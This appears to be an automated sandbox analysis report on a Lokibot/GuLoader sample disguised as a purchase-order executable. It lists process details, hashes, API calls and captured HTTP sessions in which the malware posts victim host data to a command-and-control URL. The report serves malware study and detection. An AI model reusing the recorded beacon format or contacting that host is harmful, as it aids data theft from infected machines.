                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:34.109647989 CET | 5371 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:33 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 8
                            Source IP: 192.168.2.5
                            Source Port: 49740
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:34.630259037 CET | 5372 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:34.792737007 CET | 5372 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:34.981544971 CET | 5372 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:34 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session ID: 9
                            Source IP: 192.168.2.5
                            Source Port: 49741
                            Destination IP: 192.185.78.145
                            Destination Port: 80
                            Process: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 23, 2021 08:49:35.508750916 CET | 5373 | OUT | POST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:35.676172972 CET | 5379 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:35.876161098 CET | 5382 | IN | HTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:35 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Memory Usage

                            High Level Behavior Distribution

                            Behavior

                            System Behavior

                            General

                            Start time: 08:47:58
                            Start date: 23/02/2021
                            Path: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit): true
                            Commandline: 'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase: 0x400000
                            File size: 86016 bytes
                            MD5 hash: FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: Visual Basic
                            Reputation: low

                            General

                            Start time: 08:48:51
                            Start date: 23/02/2021
                            Path: C:\Users\user\Desktop\PO-A2174679-06.exe
                            Wow64 process (32bit): true
                            Commandline: 'C:\Users\user\Desktop\PO-A2174679-06.exe'
                            Imagebase: 0x400000
                            File size: 86016 bytes
                            MD5 hash: FDEC289FB4626DD56BBB55770AE5F432
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation:low

                            Disassembly

                            Code Analysis


                              Executed Functions

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: W.E$7%=_
                              • API String ID: 1029625771-218856640
                              • Opcode ID: 9966bc6b746c6a629a21a45f0c6626850fe219bed8ef6e65f8a9954a5cfc30c7
                              • Instruction ID: 3b21657f3ab2881bcf398021d910ef46cdac12cf1210e9021a12f704b6be0b18
                              • Opcode Fuzzy Hash: 9966bc6b746c6a629a21a45f0c6626850fe219bed8ef6e65f8a9954a5cfc30c7
                              • Instruction Fuzzy Hash: 22C25679240386AADB229FA9CD553987762EF5375CF7880CDD4908B093D332D696CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 02BC6443: LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationInitializeLibraryLoadThreadThunk
                              • String ID: 1.!T
                              • API String ID: 322515642-3147410236
                              • Opcode ID: c36d9146f8691be58fcde61e2a426680c4607e7cd6b461b9aaf6459939f989b6
                              • Instruction ID: 51c3c5f6fedef889a7a20e7524445e65f623e61e13798fcee673d6b5511b8070
                              • Opcode Fuzzy Hash: c36d9146f8691be58fcde61e2a426680c4607e7cd6b461b9aaf6459939f989b6
                              • Instruction Fuzzy Hash: 9B127570600349AFEB215F68CDA17D93BA3EF82714F7481ADEE849B1D1D7759980CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: cf650a143b4412a58a1764acec32500fb32fe05647ea4564667a5933c40408f8
                              • Instruction ID: c8bf0433eb0ac6fa9c64246ceee95ccc4567ac8f4a6ad16afc9be72fc61a3bda
                              • Opcode Fuzzy Hash: cf650a143b4412a58a1764acec32500fb32fe05647ea4564667a5933c40408f8
                              • Instruction Fuzzy Hash: 6D12547060034AAFFB315E68CDA4BE93BA2EF42754F7481A9EE449B1D0D7759980CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationInitializeThreadThunk
                              • String ID: 1.!T
                              • API String ID: 1629277043-3147410236
                              • Opcode ID: dc7137749fc900a6cc457c2aeeb1e1c356240bc47a1d74ee7e93d5a4fabf853f
                              • Instruction ID: 12f5d95a62c107f818034b4822f65c172af4b4db4622e5b62bb5f6e35143af78
                              • Opcode Fuzzy Hash: dc7137749fc900a6cc457c2aeeb1e1c356240bc47a1d74ee7e93d5a4fabf853f
                              • Instruction Fuzzy Hash: 2A919F7450438ADBEB215FBC8AB539A7BB2EF13754F7482DDD9904B0A2E7708505CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(02BC0764,?,00000000,00000000,02BC0CD2,00000000,?,00003000,00000004), ref: 02BC0748
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: 39a1c590d7deea0007c8a0deddbc0699b4c19984b8079c77f1afed08ea1ddef1
                              • Instruction ID: f2b392c7d9d6bcffecec41416d59462e33edd895930d16ace583d2257b4a858e
                              • Opcode Fuzzy Hash: 39a1c590d7deea0007c8a0deddbc0699b4c19984b8079c77f1afed08ea1ddef1
                              • Instruction Fuzzy Hash: C1712A74500386EBEB216FBC8DB139A77A2DF13768F7482D9D9A04B0D2E7718545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: AJhb
                              • API String ID: 0-1903757705
                              • Opcode ID: 1708631209ddefdaa948148ce8df3caf9b4947e66523307b1a29d08c9e090987
                              • Instruction ID: 2122da860750add6d12eb7f9d5c912a7e461c13f4310c5b079a2dbfc2afc621d
                              • Opcode Fuzzy Hash: 1708631209ddefdaa948148ce8df3caf9b4947e66523307b1a29d08c9e090987
                              • Instruction Fuzzy Hash: 89C133717443456FEF224F60CD95BE83AA3AF86304F74C1ADEE889A2D1C7B99480CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: AJhb
                              • API String ID: 1029625771-1903757705
                              • Opcode ID: 3b04bf31830473e07c05f9b8cc34fe31abae411e2d8ad0e7a5f4dc720a0d0c1c
                              • Instruction ID: 56f61e1429b0622916ead5dea038c0b8dda0f4ad6a07ca0b82d2cf941a621a63
                              • Opcode Fuzzy Hash: 3b04bf31830473e07c05f9b8cc34fe31abae411e2d8ad0e7a5f4dc720a0d0c1c
                              • Instruction Fuzzy Hash: 9DF15475700301AFFB350E68CD84BE97AA7EF86314F70816DEE85A62C4D7B598C1CA50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: d160d31f6f5a86d0cbfdaca28d8a4f86634f7de341e80e8c665f2bf527866389
                              • Instruction ID: 43bb9865102d54d4b95ba673762b29d05991f74f76205a351b53124b9f67d448
                              • Opcode Fuzzy Hash: d160d31f6f5a86d0cbfdaca28d8a4f86634f7de341e80e8c665f2bf527866389
                              • Instruction Fuzzy Hash: B8818B7460438ADBEB215FBC89B03AA77A2DF13764FB482EDD991570D2E7709444CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 0f0ead122c33a67c044e3d8bcb0539e329db315edd5dbb662c7a5e22d35bbb08
                              • Instruction ID: d0186f108d809c45a950bc9145a2d8b27fefed074502e977e73c28967854db32
                              • Opcode Fuzzy Hash: 0f0ead122c33a67c044e3d8bcb0539e329db315edd5dbb662c7a5e22d35bbb08
                              • Instruction Fuzzy Hash: CD71697460038ADAEB215EBC8AB03DA77A2DF03764FB482E9DD90470D2E771C445CA82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 02BC6443: LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationLibraryLoadThread
                              • String ID: 1.!T
                              • API String ID: 543350213-3147410236
                              • Opcode ID: 60def572062a4a3dfda7579a490545d268d14e1241085b1cedf38e48f3ecc3f4
                              • Instruction ID: ef6ff0e752de341dac142889b9bd2996b88730fbf2c463ef7f8c788ec0cc5fb3
                              • Opcode Fuzzy Hash: 60def572062a4a3dfda7579a490545d268d14e1241085b1cedf38e48f3ecc3f4
                              • Instruction Fuzzy Hash: 6F713B7460078ADBEB215FBC8EB039A77A2DF13764F7492E9D960470D2E7708545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 6358b112bd10160f428779cd0e9e18536c15f0b89a16b56128ebee2e7ee864f0
                              • Instruction ID: abbd6b7e9351baaafafe3d70cb420eda57654f35f65deab8d910266e6ae67c49
                              • Opcode Fuzzy Hash: 6358b112bd10160f428779cd0e9e18536c15f0b89a16b56128ebee2e7ee864f0
                              • Instruction Fuzzy Hash: 3161497450038ADBEB215FBC8DB539A77A2DF13B64F7442D9D9904B0E2E7708545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 5cfd5da95c71f2cee7b8e6abe58a1572539ab986310713ea01b2198c2ffd1210
                              • Instruction ID: a2c6db232c8a75ce96cbd76a1e90bf118086ffe73e9d17003317118926646fb3
                              • Opcode Fuzzy Hash: 5cfd5da95c71f2cee7b8e6abe58a1572539ab986310713ea01b2198c2ffd1210
                              • Instruction Fuzzy Hash: 0871597450038ADBEB215FBC89B139A77A2DF13B64F7482D9D9904B0E2E7708545CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6493c670f3f41acaf8f09acd4077287489f10651e9033c3153bb017b745fdfe
                              • Instruction ID: 35f486afd64baabc1949319ba7722b44eafed53e7646dee7d29b4ec7cfda0132
                              • Opcode Fuzzy Hash: d6493c670f3f41acaf8f09acd4077287489f10651e9033c3153bb017b745fdfe
                              • Instruction Fuzzy Hash: 36124974700346AFEB259F68CC94BD8BB92EF92314FA4C1ADE9844B1D1D775C482CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 953d2234080071abd0ec777cd239120c9a98cc1f01c122a090f31e549e484c4a
                              • Instruction ID: c9071f9b621e8adcf7679c8fbcabdeb7cd25080bb65090e86748d093be01ef4c
                              • Opcode Fuzzy Hash: 953d2234080071abd0ec777cd239120c9a98cc1f01c122a090f31e549e484c4a
                              • Instruction Fuzzy Hash: 25323479140AC6EAC7279FAAD5493187762EF1370CF68A4C9D0504B463D372D6A6CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0d78b2802d6162dd3bf2464ec3f5d95489a32fffcfc9c27be6405e5f4d42073c
                              • Instruction ID: 5cfe20cfe6a4c270f68edaf7c0d28380048649b0cc65903e131879ba66d1a6b5
                              • Opcode Fuzzy Hash: 0d78b2802d6162dd3bf2464ec3f5d95489a32fffcfc9c27be6405e5f4d42073c
                              • Instruction Fuzzy Hash: 05C144B5600346BBEB225FA4CD8579877A3EF82308F34C09CE9449B192C376D595CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa21cd9df7ed418c3fa57398891954fdda24e3235e09b1a1ce91d0726021285a
                              • Instruction ID: 63027ecada5cc16d2aea0e09b969d5e3670308401bf6ab5cdf9ffa55585855b9
                              • Opcode Fuzzy Hash: aa21cd9df7ed418c3fa57398891954fdda24e3235e09b1a1ce91d0726021285a
                              • Instruction Fuzzy Hash: 7D91F5B1740205AFFB255E64CD85BE83AA3EFC5704F74C169FE449A2D0CBB998C48B54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 02BC3297
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 04288211a0261a6d762d08d3ce8841100d2321533db635317677ca54c5e036f4
                              • Instruction ID: 3ad76bb57945839e71aaac6e5dc64e39b265c8c366c33ca8966b40a40ee0da86
                              • Opcode Fuzzy Hash: 04288211a0261a6d762d08d3ce8841100d2321533db635317677ca54c5e036f4
                              • Instruction Fuzzy Hash: 55A12675200789AFEB225F64CD857D87BA3EF9270CF64C089E9808A092D776D5D5CBC1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 02BC08F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID:
                              • API String ID: 4046476035-0
                              • Opcode ID: dde95e2acfd6f2544eba8aaa9ac16bb0720cc94cb8ae645e53ff8d4c196302b0
                              • Instruction ID: a1ee09efe2de274a91f83ac7f5e9eec30847a1ceb3676948a3febfba07bbc1dd
                              • Opcode Fuzzy Hash: dde95e2acfd6f2544eba8aaa9ac16bb0720cc94cb8ae645e53ff8d4c196302b0
                              • Instruction Fuzzy Hash: BF9106781007CAEAC7166FADC965358B762EF13B5CF2895C9D150474A3E3319256CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 02BC3297
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 734cb950b26d81c38c27b41b819a4625f5e4cf536d5f45be07fcce03c529d82a
                              • Instruction ID: 3689b30769ea04861afe3501efa90b9e64f91e41414b9628a715f970a0972624
                              • Opcode Fuzzy Hash: 734cb950b26d81c38c27b41b819a4625f5e4cf536d5f45be07fcce03c529d82a
                              • Instruction Fuzzy Hash: 67710479200689BEDB279FA9CC8439877A3EF4230CF64D0C9E55486062D376D5D6CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 948b5c48222e6c4ad95480b19fe74e08a974e7171c2e7782375c1032772d1cd8
                              • Instruction ID: c6a931739a70d3cf13134da71636396c5d028050e4d3a92a36e869e5e8fb8a98
                              • Opcode Fuzzy Hash: 948b5c48222e6c4ad95480b19fe74e08a974e7171c2e7782375c1032772d1cd8
                              • Instruction Fuzzy Hash: F751843410068ACEDB275FACC618368B372EF53B58FA4A5DDD5508A465E3359885CFC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: ee2dab839e9cb1c3a12e445cd0abd5a3bf72b6d4141ae5dbb24548bd13892d33
                              • Instruction ID: 9c357ba167f6055629268dc28508d7ce0719096cce9acd2c0c0904aa39986599
                              • Opcode Fuzzy Hash: ee2dab839e9cb1c3a12e445cd0abd5a3bf72b6d4141ae5dbb24548bd13892d33
                              • Instruction Fuzzy Hash: 52512939240786EAD727AFAAD5493187762EF1370CF6854CDD06047463E372D6A6CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 8b8b3579f0bf6b5a88e8939f18e35643029905070c0bf860ff2fa0aec70e442e
                              • Instruction ID: 3a2be301c2232c9cd76b07f3f821a699f1d61d20601fafc692cfea5113029d53
                              • Opcode Fuzzy Hash: 8b8b3579f0bf6b5a88e8939f18e35643029905070c0bf860ff2fa0aec70e442e
                              • Instruction Fuzzy Hash: 5331F7306006098EEF2A6E68C9AC7E577B2EF56328FB946BDCD9587094D33484C5CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 4fcc14bc79118ec1aa82e7f12d175f1dc7e19872f6d080d082f014d59e870a07
                              • Instruction ID: 3902e7b6f2f57222e4b6caedc4a581c2852ead0416d987dca80168da6548a65d
                              • Opcode Fuzzy Hash: 4fcc14bc79118ec1aa82e7f12d175f1dc7e19872f6d080d082f014d59e870a07
                              • Instruction Fuzzy Hash: E621D5306006158EEF2A6E68C86C7A576B2EF46329FA946BDCD55870A4C334C4C4CF41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02BC76A9,00000040,02BC07FD,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 02BC7B51
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a42441fea43ff8b453d91700089c2a214c97c4c817970c86ca460e16e2081fb1
                              • Instruction ID: 60d4e1d9741b5a3095e7b2e466520dea8af5070dbbc7f03efdbb5b69ab402f7b
                              • Opcode Fuzzy Hash: a42441fea43ff8b453d91700089c2a214c97c4c817970c86ca460e16e2081fb1
                              • Instruction Fuzzy Hash: E6C012E02240002E68058A68CD48D2BB2AA8AD8A28B10C32CB832222CCC930EC048572
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaI4Var.MSVBVM60(?), ref: 0040DB37
                              • __vbaStrCopy.MSVBVM60 ref: 0040DB43
                              • __vbaI4Var.MSVBVM60(?), ref: 0040DB52
                              • __vbaLenBstr.MSVBVM60(?), ref: 0040DB60
                              • #632.MSVBVM60(?,?,00000000,?), ref: 0040DBBD
                              • __vbaStrVarVal.MSVBVM60(?,?), ref: 0040DBCB
                              • #516.MSVBVM60(00000000), ref: 0040DBD2
                              • #573.MSVBVM60(?,?), ref: 0040DBF4
                              • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0040DC0F
                              • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040DC16
                              • __vbaStrMove.MSVBVM60 ref: 0040DC20
                              • __vbaFreeStr.MSVBVM60 ref: 0040DC25
                              • __vbaFreeVarList.MSVBVM60(00000005,00000002,?,00000002,?,?), ref: 0040DC4A
                              • __vbaStrCat.MSVBVM60(?,0040C178), ref: 0040DC7B
                              • #650.MSVBVM60(?,0000000A,00000001,00000001,?,0040C178), ref: 0040DC97
                              • __vbaStrMove.MSVBVM60(?,0040C178), ref: 0040DCA1
                              • __vbaFreeVarList.MSVBVM60(00000002,00000008,0000000A,?,0040C178), ref: 0040DCAD
                              • __vbaFreeVar.MSVBVM60(0040DD09), ref: 0040DCF8
                              • __vbaFreeVar.MSVBVM60 ref: 0040DCFD
                              • __vbaFreeStr.MSVBVM60 ref: 0040DD02
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$Move$List$#516#573#632#650BstrCopy
                              • String ID: @Z@Z$Approvance7$Dernes8$Eminente7$FLJTESPILLERES$GENERALSTREJKENS$HYPAUTOMORPHIC$MAVEKNEBET$Menoplania$PDAGOGIKKERE$UFORSTANDIGHEDERS$Xs$abstort$anstdeliges$retsmders
                              • API String ID: 3299726966-3599177649
                              • Opcode ID: eb0265a4717498cbac98f82b4f71b09fbc8918a23123987427829c869ea325de
                              • Instruction ID: 5c26d3c9f5a76fd7195534f51019f2a06c89fa06f254f309d5fb61b063fb7e1a
                              • Opcode Fuzzy Hash: eb0265a4717498cbac98f82b4f71b09fbc8918a23123987427829c869ea325de
                              • Instruction Fuzzy Hash: 6953F775A00218DFDB24DF90CD88BDABBB5BB48301F1086EAE54AB7290DB745AC5CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 0041172B
                              • #663.MSVBVM60(?,0040C4D4,?,00000001,00000001), ref: 00411742
                              • __vbaVarTstNe.MSVBVM60(?,?), ref: 0041175E
                              • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00411771
                              • __vbaFpI4.MSVBVM60 ref: 0041178A
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE78,00000064), ref: 004117A4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$#663CheckFreeHresultList
                              • String ID: 1-1-1
                              • API String ID: 3462652701-1550238906
                              • Opcode ID: cc634e36ab2d1ca5b999e065f365d04f10b2cd118a50263bd855a6a7a8ecea54
